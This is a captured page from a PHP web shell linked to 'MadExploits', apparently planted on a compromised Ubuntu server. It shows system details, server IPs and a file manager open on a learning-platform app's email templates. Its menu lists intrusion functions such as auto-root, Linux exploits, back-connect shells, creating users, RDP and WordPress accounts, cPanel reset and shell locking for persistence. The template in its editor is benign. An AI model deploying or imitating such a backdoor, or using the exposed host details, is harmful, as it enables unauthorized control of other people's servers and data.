Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
resources /
views /
emails /
[ HOME SHELL ]
Name
Size
Permission
Action
account_request.blade.php
12.32
KB
-rw-r--r--
activation.blade.php
8.28
KB
-rw-r--r--
approve_account_request.blade....
9.74
KB
-rw-r--r--
disapprove_account_request.bla...
9.44
KB
-rw-r--r--
email.blade.php
34.54
KB
-rw-r--r--
email_test.blade.php
1.05
KB
-rw-r--r--
forgot_password.blade.php
6.88
KB
-rw-r--r--
invitation.blade.php
8.31
KB
-rw-r--r--
invoice.blade.php
12.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : email_test.blade.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width"/> <title>TenderApp</title> <style type="text/css"> body { margin: 0 0; padding: 0 0; font-size: 14px; background: #ffffff; color: #545454 } table { border-collapse: collapse; } @media only screen and (max-width: 600px) { body, table, td, p, a, li, blockquote { -webkit-text-size-adjust: none !important; } table { width: 100% !important; } .responsive-image img { height: auto !important; max-width: 100% !important; width: 100% !important; } } </style> </head> <body> Hi {{$name}} </body> </html>
Close